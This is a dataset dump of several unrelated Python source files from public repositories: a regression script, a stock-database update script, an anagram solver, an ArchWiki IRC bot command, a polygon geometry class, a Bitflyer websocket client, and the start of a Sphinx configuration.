print(' k = ', self.k, ' testIndex = ', self.testIndex, ' lambda = ', self.lamb, ' sseTest: ',
self.sseTest, ' sseTraining: ', self.sseTraining)
#print('theta: ', self.theta)
return
def calculateError(X, theta, Y):
estimation = X.dot(theta)
error = []
for i in range(0, Y.__len__()):
er = estimation[i] - Y[i]
error.append(er * er)
return sum(error) / Y.__len__()
def calculateErrorSkLearn(estimation, Y):
error = []
for i in range(0, Y.__len__()):
er = estimation[i] - Y[i]
error.append(er * er)
return sum(error) / Y.__len__()
def calculateThetaClosedForm(X, Y):
X_Transpose = X.transpose()
theta = inv(X_Transpose.dot(X)).dot(X_Transpose).dot(Y)
return theta
def getGradient(X, theta, Y, learningRate):
X_transpose = X.transpose()
estimation = X.dot(theta)
error = estimation - Y
gradient = X_transpose.dot(error) / (2 * Y.__len__())
gradient = learningRate * gradient
return gradient
def getConvergence(newTheta, oldTheta):
'L1 error for thetas in gradient descent'
diff = newTheta - oldTheta
l1Norm = 0
for n in diff:
l1Norm += abs(n)
return l1Norm
def calculateThetaRidge(X, Y, lamb):
X_Transpose = X.transpose()
# make regularization matrix for lambda
xCol = np.shape(X)[1]
regMatrix = np.eye(xCol)
regMatrix = lamb * regMatrix
regMatrix_Transpose = regMatrix.transpose()
theta = inv(X_Transpose.dot(X) + regMatrix_Transpose.dot(regMatrix)).dot(X_Transpose).dot(Y)
return theta
def calculateThetaGradientDescent(X, yTraining, n):
maxIterations = 10000
epsilon = 0.0001
oldTheta = []
newTheta = np.ones(n + 1) # starting with 1s as initial theta
for i in range(0, maxIterations):
oldTheta = newTheta
newTheta = newTheta - getGradient(X, newTheta, yTraining, 0.001)
error = getConvergence(newTheta, oldTheta)
# print('Iteration: ', i, ' Convergence: ', error)
if error <= epsilon:
print('Converged')
break
return newTheta
def getPhi(X, n):
rows = X.__len__()
cols = n + 1
phi = np.ones(shape=(rows, cols)) # all 1s
phi[:, 1] = X # 2nd row is X
for ind in range(2, n + 1):
phi[:, ind] = pow(phi[:, 1], ind)
return phi
def ridgeRegression(xTraining, yTraining,xTest, yTest, lambdaList, kList):
print('Ridge Regression\n')
findings = []
for k in kList:
# partition as per K
#partitionXList = np.vsplit(xTraining, k) # row wise partition
partitionXList = utils.getPartitions(xTraining, k)
#partitionYList = np.array_split(yTraining, k)
partitionYList = utils.getPartitionsList(yTraining, k)
for i in range(0, k): # take partition i as test
# select partition i as test set
xTst = partitionXList[i]
yTst = partitionYList[i]
# rest is training
xTrnList = [] # holds selected partitions to merge later
xTrn = [] # merged training set
yTrn = [] # merged test set
for j in range(0, k): # combine training partitions
if i != j:
xTrnList.append(partitionXList[j]) # list of matrices
yTrn.extend(partitionYList[j])
# get xTrn from xTrnList
totalRows = 0
for xPart in xTrnList:
totalRows += np.shape(xPart)[0]
xTrn = np.zeros((totalRows, np.shape(xTraining)[1]))
# merge training partitions
rowCtr = 0
for m in xTrnList:
noRows = np.shape(m)[0]
xTrn[rowCtr:rowCtr+noRows, :] = m
rowCtr += noRows
# X, Y, xTst, yTest
# for each hyper param, check error
for lamb in lambdaList:
theta = calculateThetaRidge(xTrn, yTrn, lamb)
sseTraining = calculateError(xTrn, theta, yTrn)
sseTest = calculateError(xTst, theta, yTst)
# store findings in object
resObj = RidgeRegResults()
resObj.setResults(k, lamb, i, sseTraining, sseTest, theta)
findings.append(resObj)
'''
if not not findings:
for f in findings:
f.printData()
'''
# get optimal lambda, sseTest, sseTraining, theta - sort on sseTest
findings = sorted(findings, key=lambda linkObj: linkObj.sseTest)
print('Findings length = ', findings.__len__())
print('Error in ridge reg: ', findings[0].sseTest)
print('Error in ridge reg last: ', findings[-1].sseTest)
reg = LinearRegression().fit(xTraining, yTraining)
reg.score(xTraining, yTraining)
print('sklearn training: ', calculateErrorSkLearn(reg.predict(xTraining), yTraining))
print('sklearn testing: ', calculateErrorSkLearn(reg.predict(xTest), yTest))
return findings[0].theta, findings
def ridgeNew(xTraining, yTraining,xTest, yTest, lambdaList, kList):
print('Ridge Regression\n')
findings = []
for lamb in lambdaList:
theta = calculateThetaRidge(xTraining, yTraining, lamb)
sseTraining = calculateError(xTraining, theta, yTraining)
sseTest = calculateError(xTest, theta, yTest)
# store findings in object
resObj = RidgeRegResults()
resObj.setResults(0, lamb, 0, sseTraining, sseTest, theta)
findings.append(resObj)
# get optimal lambda, sseTest, sseTraining, theta - sort on sseTest
findings = sorted(findings, key=lambda linkObj: linkObj.sseTest)
print('Findings length = ', findings.__len__())
print('Error in ridge reg: ', findings[0].sseTest)
print('Error in ridge reg last: ', findings[-1].sseTest)
return findings[0].theta, findings
def main():
lambdaList = [0.01]
kList = [2,3]
x = np.arange(24).reshape(6, 4)
#x = np.mat(x)
#x = np.squeeze(np.asarray(x))
y = [1, 2, 3, 4, 5, 6]
#y = np.mat(y)
y = array(y)
print(np.shape(x))
print(np.shape(y))
print(type(x))
print(type(y))
# ridgeRegression(xTraining, yTraining, xTest, yTest, lambdaList, kList, nList = 0)
print('theta: \n', ridgeRegression(x,y.transpose(),lambdaList,kList))
return
def linearReg(xTraining, yTraining, xTest, yTest, nList = 0):
print('Linear Regression\n')
X = xTraining
print('With closed form:')
theta = calculateThetaClosedForm(X, yTraining)
print('Theta: ', theta)
sseTraining = calculateError(X, theta, yTraining)
print('Error for training: ', sseTraining)
#sseTest = calculateError(phiXTest, theta, yTest)
sseTest = calculateError(xTest, theta, yTest)
print('Error for testing: ', sseTest)
print('\n')
'''
print('With gradient descent:')
theta = calculateThetaGradientDescent(X, yTraining, n)
print('Theta: ', theta)
sseTraining = calculateError(X, theta, yTraining)
print('Error for training: ', sseTraining)
sseTest = calculateError(phiXTest, theta, yTest)
print('Error for testing: ', sseTest)
print('\n')
'''
return theta
# main()
'''
def main():
# Linear regression
# load data
dataSet = sio.loadmat('./dataset1.mat', squeeze_me=True)
xTraining = dataSet['X_trn']
yTraining = dataSet['Y_trn']
xTest = dataSet['X_tst']
yTest = dataSet['Y_tst']
n = [2, 3]
linearReg(xTraining, yTraining, xTest, yTest, n)
# Ridge regression
dataSet = sio.loadmat('./dataset2.mat', squeeze_me=True)
xTraining = dataSet['X_trn']
yTraining = dataSet['Y_trn']
xTest = dataSet['X_tst']
yTest = dataSet['Y_tst']
lambdaList = [0.01, 0.02, 0.05, 0.1, 0.25, 0.5, 1]
kList = [2, 10, yTraining.__len__()]
nList = [2, 5]
ridgeRegression(xTraining, yTraining, xTest, yTest, lambdaList, kList, nList)
return
'''
#main()
| [
"[email protected]"
] | |
85ab2941878d47522bed6e8ecb023b9ccf8a7bfd | 31059d647e1294b7da3947cd03d2704019423698 | /alter_elist_add_fxfs.py | 0fa1dc5ff5a2d4178a84f12a75308696bd50c99f | [] | no_license | ZQ-Qi/stock_analysis | aadd1beec9505a30e61be3ffc9ba1e552b28a7e5 | 063a39af182e9f6c98211a40a967f374472fafd5 | refs/heads/master | 2022-02-28T22:46:44.547653 | 2019-10-01T08:07:21 | 2019-10-01T08:07:21 | 198,556,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | """
为event_list添加fxfs列
"""
import db_pool
def get_fxfs_from_zfss(db_p, gpdm, dt):
conn = db_p.connection()
cur = conn.cursor()
sql = "select fxfs from zfss where gpdm = '{}' and ssggr = '{}';".format(gpdm, dt)
cur.execute(sql)
result = []
for item in cur.fetchall():
result.append(item[0])
cur.close()
conn.close()
if len(result) == 1:
return result[0]
elif len(result) > 1: # 如果得到多于1个的发行方式,判断发行方式是否一致
flag = True
for i in range(1, len(result)):
if result[0] != result[i]:
flag = False
if flag: # 如果两次或两次同时发行,发行方式一致则返回一致的发行方式
return result[0]
else: # 两次或多次发行方式不一致
print("{}在{}的增发存在多种发行方式:{}".format(gpdm, dt, result))
sorted_result = []
for i in result:
if i not in sorted_result:
sorted_result.append(i)
return ",".join(sorted_result)
else: # 若无检索结果,返回Error
return 'Error'
def update_eventlist_add_fxfs(db_p, dataset):
conn = db_p.connection()
cur = conn.cursor()
for list in dataset:
sql = "update event_list set fxfs = '{}' where gpdm = '{}' and dt = '{}'".format(list[2], list[0], list[1])
cur.execute(sql)
conn.commit()
cur.close()
conn.close()
if __name__ == "__main__":
db_p = db_pool.get_db_pool(False)
conn = db_p.connection()
cur = conn.cursor()
sql = "select gpdm, dt from event_list where isipo = 0 and fxfs is null;"
cur.execute(sql)
e_list = []
for item in cur.fetchall():
e_list.append([item[0], item[1]])
# print(e_list)
cur.close()
conn.close()
for i in range(0, len(e_list)):
fxfs = get_fxfs_from_zfss(db_p, e_list[i][0], e_list[i][1])
e_list[i].append(fxfs)
update_eventlist_add_fxfs(db_p, e_list)
| [
"[email protected]"
] | |
d9490cc769b627d539016c7c03a8e2e7f239b62d | 2d925dda36ff0eefcaf5c90e458c2b22535aa4f7 | /anagram/anagram.py | 8fb6d872752ab60846d7c0c059105a30579f40cd | [] | no_license | butterflylady/exercism | 0e06fd1a037cebf9e5557007a1bca9f7fc8cb55a | db269c86f5bea138cd9754a9598803f9db28958a | refs/heads/master | 2023-02-21T14:08:14.031962 | 2021-01-31T15:28:40 | 2021-01-31T15:28:40 | 334,437,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py | def find_anagrams(word, candidates):
output = []
for candidate in candidates:
if sorted(candidate.lower()) == sorted(word.lower()) and candidate.lower() != word.lower():
output.append(candidate)
return output
| [
"[email protected]"
] | |
40b4f0b5df2d355ba842d5f383f5bf540849b622 | c5c515271252c72960d25ee4e06223a6218c9b11 | /modules/archwiki.py | e954e0995c4d7e313db1318f11d48697b4638a2c | [] | no_license | Ramblurr/phenny | 94c7640333af04ef6b603fcd50e55e010cfe7def | 2ae48cfb1bfba4504369ea219309fb1c8ee7f0ca | refs/heads/master | 2021-01-16T20:03:06.138297 | 2011-09-08T20:50:13 | 2011-09-08T20:50:13 | 1,330,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,723 | py | #!/usr/bin/env python
"""
archwiki.py - Phenny ArchWiki Module
Copyright 2008-9, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://inamidst.com/phenny/
modified from Wikipedia module
author: mutantmonkey <[email protected]>
"""
import re, urllib
import web
import json
wikiapi = 'https://wiki.archlinux.org/api.php?action=query&list=search&srsearch=%s&limit=1&prop=snippet&format=json'
wikiuri = 'https://wiki.archlinux.org/index.php/%s'
wikisearch = 'https://wiki.archlinux.org/index.php/Special:Search?' \
+ 'search=%s&fulltext=Search'
r_tr = re.compile(r'(?ims)<tr[^>]*>.*?</tr>')
r_content = re.compile(r'(?ims)</p>\n</div>.*?<!-- end content -->')
r_paragraph = re.compile(r'(?ims)<p[^>]*>.*?</p>|<li(?!n)[^>]*>.*?</li>')
r_tag = re.compile(r'<(?!!)[^>]+>')
r_whitespace = re.compile(r'[\t\r\n ]+')
r_redirect = re.compile(
r'(?ims)class=.redirectText.>\s*<a\s*href=./wiki/([^"/]+)'
)
abbrs = ['etc', 'ca', 'cf', 'Co', 'Ltd', 'Inc', 'Mt', 'Mr', 'Mrs',
'Dr', 'Ms', 'Rev', 'Fr', 'St', 'Sgt', 'pron', 'approx', 'lit',
'syn', 'transl', 'sess', 'fl', 'Op'] \
+ list('ABCDEFGHIJKLMNOPQRSTUVWXYZ') \
+ list('abcdefghijklmnopqrstuvwxyz')
t_sentence = r'^.{5,}?(?<!\b%s)(?:\.(?=[\[ ][A-Z0-9]|\Z)|\Z)'
r_sentence = re.compile(t_sentence % r')(?<!\b'.join(abbrs))
def unescape(s):
s = s.replace('>', '>')
s = s.replace('<', '<')
s = s.replace('&', '&')
s = s.replace(' ', ' ')
return s
def text(html):
html = r_tag.sub('', html)
html = r_whitespace.sub(' ', html)
return unescape(html).strip()
def archwiki(term, last=False):
global wikiapi, wikiuri
url = wikiapi % term
bytes = web.get(url)
result = json.loads(bytes)
result = result['query']['search']
if len(result) <= 0:
return None
term = result[0]['title']
term = term.replace(' ', '_')
snippet = text(result[0]['snippet'])
return "%s - %s" % (snippet, wikiuri % term)
def awik(phenny, input):
origterm = input.groups()[1]
if not origterm:
return phenny.say('Perhaps you meant ".awik dwm"?')
origterm = origterm.encode('utf-8')
term = urllib.unquote(origterm)
term = term[0].upper() + term[1:]
term = term.replace(' ', '_')
try: result = archwiki(term)
except IOError:
error = "Can't connect to wiki.archlinux.org (%s)" % (wikiuri % term)
return phenny.say(error)
if result is not None:
phenny.say(result)
else: phenny.say('Can\'t find anything in the ArchWiki for "%s".' % origterm)
awik.commands = ['awik']
awik.priority = 'high'
if __name__ == '__main__':
print __doc__.strip()
| [
"[email protected]"
] | |
0b002e3505a22cf48a76a9204c69ed9ff0a0bb6d | 7a8462ca6a11feabce71ff4a52d1f5aedd43579e | /AxiSEM3D/python_scripts/wisdom_kernel.py | 9667d18a2ff554b0288cef602aa54096d0d1a749 | [
"MIT"
] | permissive | AlexSzen/private_Axisem3D | ae33784098213e8af176ebe3a39d8a7e95b8abbd | a213a8ae7322c2089c7ea04405ef2f50fe3dbe72 | refs/heads/master | 2022-05-14T17:35:45.405735 | 2019-11-06T15:11:12 | 2019-11-06T15:11:12 | 153,783,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | '''
given a kernel with a fourier expansion, looks at
decay of fourier coefficients to produce a new fourier expansion
sufficient to model the kernel.
objective : learn the maximal necessary expansion for kernels.
'''
import numpy as np
class wisdom:
def __init__(self, kernel, nuKer, epsilon):
self.kernel = np.squeeze(kernel)
self.nuKer = nuKer
self.nelem = len(nuKer)
self.nu_sum = np.cumsum(np.concatenate(([0],nuKer)))[:-1]
self.epsilon = epsilon
def learn_wisdom(self,comp):
wisdom_nu = []
totalMax = np.max(np.abs(self.kernel[:, comp, :, :] + 1j * self.kernel[:, comp+1, :, :]))
for ielem in range(self.nelem):
nuElem = self.nuKer[ielem]
nuOffset = self.nu_sum[ielem]
wisdom_nu_elem = []
for ipol in range(5):
for jpol in range(5):
absKerPoint = np.abs(self.kernel[nuOffset:nuOffset+nuElem, comp, ipol, jpol] + 1j * self.kernel[nuOffset:nuOffset+nuElem, comp+1, ipol, jpol])
maxKer = np.amax(absKerPoint)
indMaxKer = np.argmax(absKerPoint)
if maxKer < 1e-7 * totalMax:
wisdom_nu_elem.append(0)
continue
for inu in range(indMaxKer, nuElem):
if absKerPoint[inu] < self.epsilon * maxKer:
wisdom_nu_elem.append(inu)
break
if wisdom_nu_elem == []:
max_wisdom_nu_elem = nuElem
else :
max_wisdom_nu_elem = np.max(wisdom_nu_elem)
wisdom_nu.append(max_wisdom_nu_elem)
return wisdom_nu
| [
"[email protected]"
] | |
ca01a478a22da5ba31a35679e40f37f0484ca29c | 62d2cf85a2a1649d0a8f5525f12aa95746672729 | /python_trade/sample.py | 6a6eda096f2d09a2d2a44cf2a8bd48e43de1b122 | [] | no_license | lyonLeeLPL/trade | 803361aea0fb9783c470d02cc1c3f2217b1ddd7e | 364a27e9f821bc7ec3ab2f08203d13eb66793d6e | refs/heads/master | 2022-07-17T05:27:33.004895 | 2019-12-13T09:21:00 | 2019-12-13T09:21:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,786 | py | # coding: UTF-8
import json
import websocket
from time import sleep
from logging import getLogger,INFO,StreamHandler
logger = getLogger(__name__)
handler = StreamHandler()
handler.setLevel(INFO)
logger.setLevel(INFO)
logger.addHandler(handler)
"""
This program calls Bitflyer real time API JSON-RPC2.0 over Websocket
"""
class RealtimeAPI(object):
def __init__(self, url, channel):
self.url = url
self.channel = channel
#Define Websocket
self.ws = websocket.WebSocketApp(self.url,header=None,on_open=self.on_open, on_message=self.on_message, on_error=self.on_error, on_close=self.on_close)
websocket.enableTrace(True)
def run(self):
#ws has loop. To break this press ctrl + c to occur Keyboard Interruption Exception.
self.ws.run_forever()
logger.info('Web Socket process ended.')
"""
Below are callback functions of websocket.
"""
# when we get message
def on_message(self, ws, message):
output = json.loads(message)['params']
logger.info(output)
# when error occurs
def on_error(self, ws, error):
logger.error(error)
# when websocket closed.
def on_close(self, ws):
logger.info('disconnected streaming server')
# when websocket opened.
def on_open(self, ws):
logger.info('connected streaming server')
output_json = json.dumps(
{'method' : 'subscribe',
'params' : {'channel' : self.channel}
}
)
ws.send(output_json)
if __name__ == '__main__':
#API endpoint
url = 'wss://ws.lightstream.bitflyer.com/json-rpc'
channel = 'lightning_board_snapshot_BTC_JPY'
json_rpc = RealtimeAPI(url=url, channel=channel)
#ctrl + cで終了
json_rpc.run()
| [
"[email protected]"
] | |
4fb6ff6dd32429c062cd48f322e5d6fce54804f9 | f98360a069da91c059b118a11de14c3e5c3dc867 | /ubonn-thesis/pyfeyn/myPyFeyn/draw_stuff.py | df62cf6f73c6545666147a597ac11851e692392d | [] | no_license | maxxrichard/master_thesis | 2ed417052606e369a86e6506a304a0eccff3404b | 8219aeffd80ce57588a700b51a6117e1595227a2 | refs/heads/master | 2022-10-01T11:29:25.442348 | 2020-06-04T20:28:22 | 2020-06-04T20:28:22 | 257,579,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,319 | py | from pyfeyn.lines import Fermion
from pyfeyn.lines import Photon
from pyfeyn.lines import Gluon
from pyfeyn.lines import Higgs
from pyfeyn.points import Point, Vertex
from pyfeyn.deco import Label
nfermion = -1
nboson = -1
ngluon = -1
nhiggs = -1
fermions = []
bosons = []
gluons = []
higgs = []
def draw_fermion(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global nfermion, fermions
nfermion += 1
fermions.append(Fermion(pnt1, pnt2).addArrow())
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving fermion label')
fermions[nfermion].addLabel(label)
else:
#print('Moving fermion label by', displacement)
fermions[nfermion].addLabel(
label, displace=displacement, pos=position)
fermions[nfermion].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
fermions[nfermion].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
fermions[nfermion].bend(bend)
def draw_boson(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global nboson, bosons
nboson += 1
bosons.append(Photon(pnt1, pnt2))
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving boson label')
bosons[nboson].addLabel(label)
else:
#print('Moving boson label by', displacement)
bosons[nboson].addLabel(label, displace=displacement, pos=position)
bosons[nboson].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
bosons[nboson].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
bosons[nboson].bend(bend)
def draw_gluon(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global ngluon, gluons
ngluon += 1
gluons.append(Gluon(pnt1, pnt2))
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving gluon label')
gluons[ngluon].addLabel(label)
else:
#print('Moving gluon label by', displacement)
gluons[ngluon].addLabel(label, displace=displacement, pos=position)
gluons[ngluon].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
gluons[ngluon].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
gluons[ngluon].bend(bend)
def draw_higgs(pnt1, pnt2, COLOR, label,
displacement=-0.25, position=0.5, thickness=0, bend=0):
global nhiggs, higgs
nhiggs += 1
higgs.append(Higgs(pnt1, pnt2))
if label != '':
if displacement == 0.0 and position == 0.0:
#print('Not moving Higgs label')
higgs[nhiggs].addLabel(label)
else:
#print('Moving Higgs label by', displacement)
higgs[nhiggs].addLabel(label, displace=displacement, pos=position)
higgs[nhiggs].setStyles(COLOR)
if thickness != 0:
#print('Changing thickness to', thickness)
higgs[nhiggs].addStyle(thickness)
if bend != 0:
#print('Changing bend to', bend)
higgs[nhiggs].bend(bend)
| [
"[email protected]"
] | |
8b76c4c375aea7fe9a1c694c2fa0e4056e6d9237 | 6ad27445a594f260282f2625642770214fcfc165 | /list.py | e1884270d7ae90d384d69e6e60a74c2cbd32084c | [] | no_license | SalwanSaad/Calculator | aa699b4603b246a8619a0c2a9331aef513138346 | af8da13959ff12e3945b43e96f0d17905df27554 | refs/heads/main | 2021-07-05T17:37:08.599068 | 2021-01-04T20:06:08 | 2021-01-04T20:06:08 | 216,663,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,454 | py | import math
def options():
try:
process = input("Mathematical process: ")
if len(process) > 1:
num1 = int(input("First number: "))
else:
num1 = int(input("First number: "))
num2 = int(input("Second number: "))
process2= process.upper()
if process == '-':
totall = num1 - num2
print(f'{num1} - {num2} = {totall}')
elif process == '+':
totall = num1 + num2
print(f'{num1} + {num2} = {totall}')
elif process == '/':
totall = num1 / num2
print(f'{num1} / {num2} = {totall}')
elif process == '*':
totall = num1 * num2
print(f'{num1} * {num2} = {totall}')
elif process == '%':
totall = num1 % num2
print(f'{num1} % {num2} = {totall}')
elif process2 == 'COS':
totall = math.cos(num1)
print(f'Cos({num1}) = {totall}')
elif process2 == 'SIN':
totall = math.sin(num1)
print(f'Sin({num1}) = {totall}')
elif process2 == 'TAN':
totall = math.tan(num1)
print(f'Tan({num1}) = {totall}')
else:
print('Please use the following (cos , sin , tan , + , - , * , /)')
except ZeroDivisionError:
print('You can not divide the number by zero')
except ValueError:
print('Please enter a number')
| [
"[email protected]"
] | |
b124a78815e0655538b0bb9fe7abee2151399fb4 | 6738267a19303a5f394f3ec6d0a9c7eae7398957 | /poly.py | efe3d1efb5ebcd6a5ecbafa785810ffd088843ec | [] | no_license | glotyuids/PolyGame | f7d0099b07080c2f6b5a3551b7f720d6b55c39f0 | 1d1ae11ab9c7e6de3c37cc397b90c85d28c530f3 | refs/heads/master | 2021-05-30T14:11:04.851179 | 2015-09-16T08:54:13 | 2015-09-16T08:54:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,755 | py | # -*- coding: utf-8 -*-
import copy
from math import sin,cos,tan,pi
LOG = 0
MOVE = (255,0,0)
WALL = (0,0,0)
FINISH = (0,255,0)
class Polygon():
def __init__(self,lst,tp = WALL):
self.pts = []
import pprint
print 'in Polygon!'
pprint.pprint(lst)
if self.is_poly(lst):
self.pts = lst[:]
self.move = 0
self.type = tp
def parallel_axes(self,lst):
if lst[0]!=lst[-1]:lst.append(lst[0])
for i in xrange(len(lst)-1):
if not((lst[i][0]==lst[i+1][0]) or (lst[i][1]==lst[i+1][1])):
return False
return True
def can_move(self,i=None):
if i == None:
return self.move
if i:
self.move = 1
else:
self.move = 0
def is_poly(self,a):
if not (isinstance(a,list)):
print 'a',a
raise Exception('Coordinates must be in list')
return False
if not(len(a)==4):
raise Exception('Only 4 coordinates in list')
return False
return True
def gradus2rad(self,a):
return a*pi/180
def rad2gradus(self,a):
return a*180/pi
def rotate_point(self,xy1,a=None,only_x = 0,only_y = 0):
"""
a - radian! NOT tan(alpha)
"""
xy = xy1[:]
if a == None:
return xy[:]
x = xy[0]
y = xy[1]
cosa = round(cos(a),4)
sina = round(sin(a),4)
new_x = x*cosa + y*sina
new_y = -1*x*sina+y*cosa
if only_x : return new_x
if only_y : return new_y
return [new_x,new_y]
def intersec_with_arc(self,xy,r,angle_start,angle_finish,delta_angle,every = 2):
def get_xy(x,y,rq,angle):
uy = round(y + cos(angle)*rq,3)
ux = round(x + sin(angle)*rq,3)
return [uy,ux]
x0,y0 = xy[0],xy[1]
min_angle = min([angle_start,angle_finish])
max_angle = max([angle_start,angle_finish])
angles = [x+min_angle for x in xrange(int(delta_angle)+1) if x%every]
coords = [get_xy(x0,y0,r,self.gradus2rad(i)) for i in angles]
for x in xrange(len(coords)-1):
if self.cross_with_line(coords[x],coords[x+1]):
return True
return False
def rotate(self,angle=None,nullpoint = None,new = True):
# angle - gradus
def sgn(a):
if a<0:
return -1
return 1
def normalize(a):
if not(-90<=a<=90):
angle = (abs(a)-90)*sgn(a)
normalize(a)
return True
def to_zero(g=None,np = None):
a = g[:]
if np == None:
f = a[0]
else:
f = np[:]
for i in xrange(len(a)):
if LOG: print 'i :',i,' a[i]: ',a[i],' a: ',a,' f: ',f
a[i][0] -= f[0]
a[i][1] -= f[1]
del g,np
return a[:],f
def from_zero(a=None,f=None):
b = a[:]
h = f[:]
for i in xrange(len(a)):
b[i][0] += h[0]
b[i][1] += h[1]
return b[:]
if angle < 0: angle+=360
a1 = self.pts[:]
g,h = to_zero(a1[:], np = nullpoint)
for i in xrange(len(g)):
g[i] = self.rotate_point(g[i],self.gradus2rad(angle))
j = from_zero(g[:],h[:])
if new:
pgn = copy.deepcopy(Polygon(j[:]))
pgn.move = self.move
pgn.type = self.type
return copy.deepcopy(pgn)
else:
self.pts = j[:]
def rewrite_pts(self,a):
if not (self.is_poly(a)):
return False
self.pts = a[:]
return True
def contain(self,item):
if len(item)!=2:
return False
x = item[0]
y = item[1]
minx = min([x for x,y in self.pts])
miny = min([y for x,y in self.pts])
maxx = max([x for x,y in self.pts])
maxy = max([y for x,y in self.pts])
if (minx<=x<=maxx) and (miny<=y<=maxy):
return True
return False
def find_A(self,XY1,XY2):
return XY2[1]-XY1[1]
def find_B(self,XY1,XY2):
return -XY2[0]+XY1[0]
def find_C(self,XY1,XY2):
return -XY1[0]*XY2[1]+XY2[0]*XY1[1]
def get_parameters(self,XY1,XY2):
return [self.find_A(XY1,XY2),self.find_B(XY1,XY2),self.find_C(XY1,XY2)]
def cross(self,a,AP):
a1 = a[:]
if a1[0]!=a1[-1]:a1.append(a1[0])
for i in xrange(len(a1)-1):
if self.cross_with_line(a1[i],a1[i+1],AP):
return True
return False
def near_point(self,XY,A1,d=0.1):
return ((XY[0]-A1[0])**2+(XY[1]-A1[1])**2)**(1.0/2) <= d
def near(self,a,b,c,d,dt=0.1):
if self.near_point(a,c,dt) or\
self.near_point(a,d,dt) or\
self.near_point(b,c,dt) or\
self.near_point(b,d,dt) :
return True
return False
def cross_with_line(self,xy,xy1,AP=None):
a1 = self.pts[:]
if a1[0]!=a1[-1]:a1.append(a1[0])
d = 0.1
f = True
for i in xrange(len(a1)-1):
nr = False
if not(xy == AP) or not(xy1 == AP):
if AP == None:
f = True
else:
f = not(self.near(a1[i],a1[i+1],xy,xy1,d))
nr = True
if self.cross_line(a1[i],a1[i+1],xy,xy1,nearp = nr) and f:
return True
return False
def cross_line(self,A1,A2,B1,B2,d = 1.1,nearp = False):
if self.line_on_line_cross(A1,A2,B1,B2):return False
if self.line_on_line(A1,A2,B1,B2): return False
if self.parallel_lines(A1,A2,B1,B2): return False
a = self.cross_point(A1,A2,B1,B2)
if nearp :
if self.near(A1,A2,a,a,0.1):
return False
else:
d = 1.001
return self.between(A1,A2,a,d) and self.between(B1,B2,a,d)
def cross_point(self,aXY1,aXY2,bXY1,bXY2):
"""
Ax + By + C = 0
"""
A1 = self.find_A(aXY1,aXY2)
A2 = self.find_A(bXY1,bXY2)
B1 = self.find_B(aXY1,aXY2)
B2 = self.find_B(bXY1,bXY2)
C1 = self.find_C(aXY1,aXY2)
C2 = self.find_C(bXY1,bXY2)
if (A1==A2==0) or (B1==B2==0):
return None
return [(B1*C2-B2*C1)/float(A1*B2-A2*B1),(C1*A2-C2*A1)/float(A1*B2-A2*B1)]
def cross_point_param(self,lt1,lt2):
A1,B1,C1 = lt1[0],lt1[1],lt1[2]
A2,B2,C2 = lt2[0],lt2[1],lt2[2]
if A1*B2-A2*B1 == 0:
return None
return [(B1*C2-B2*C1)/float(A1*B2-A2*B1),(C1*A2-C2*A1)/float(A1*B2-A2*B1)]
def between(self,A1,A2,XY,d = 2):
return (((XY[0]-A1[0])**2+(XY[1]-A1[1])**2)**(1.0/2) + ((A2[0]-XY[0])**2+(A2[1]-XY[1])**2)**(1.0/2)) / float(((A2[0]-A1[0])**2+(A2[1]-A1[1])**2)**(1.0/2)) <= d
def on_line(self,A1,A2,XY,d = 0.01):
return (d >= (XY[1] - A1[1]) * (A2[0] - A1[0]) - (XY[0] - A1[0]) * (A2[1] - A1[1]))
def line_on_line(self,A1,A2,B1,B2):
if self.on_line(A1,A2,B1) and self.on_line(A1,A2,B2):
return True
return False
def line_on_line_cross(self,A1,A2,B1,B2):
if self.line_on_line(A1,A2,B1,B2) and (self.between(A1,A2,B1) \
or self.between(A1,A2,B2) or self.between(B1,B2,A1) or self.between(B1,B2,A2)):
return True
return False
def parallel_lines(self,aXY1,aXY2,bXY1,bXY2):
"""
Ax + By + C = 0
"""
A1 = self.find_A(aXY1,aXY2)
A2 = self.find_A(bXY1,bXY2)
B1 = self.find_B(aXY1,aXY2)
B2 = self.find_B(bXY1,bXY2)
C1 = self.find_C(aXY1,aXY2)
C2 = self.find_C(bXY1,bXY2)
# print [A1,B1,C1],[A2,B2,C2]
if A1*B2 == A2*B1:
return True
return False
def __getslice__(self, i, j):
return self.pts[i:j]
def __nonzero__(self):
if len(self.pts)>3:
return True
return False
def __str__(self):
st = "Polygon: "+ str(self.pts)
return st
def __contains__(self,item):
return item in self.pts
def __getitem__(self,num):
return self.pts[num] | [
"[email protected]"
] | |
08e20fd5b8051010de8501c00270473ce91e4799 | cac36cd5a5b0b1d5ee25284c41d6cebe40f63293 | /epam2021sphinx/source/conf.py | 1ba128a6170e833f98fce471ffe701ebc158f4a1 | [] | no_license | sls88/python_epam_2021 | ae18d76154a00aff28773961a990da07736ba76c | d2b36912189004b578af99986363775442b4a8bd | refs/heads/master | 2023-04-18T16:32:10.951193 | 2021-05-03T17:12:11 | 2021-05-03T17:12:11 | 342,913,438 | 0 | 0 | null | 2021-05-03T17:12:12 | 2021-02-27T17:16:06 | HTML | UTF-8 | Python | false | false | 2,865 | py | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
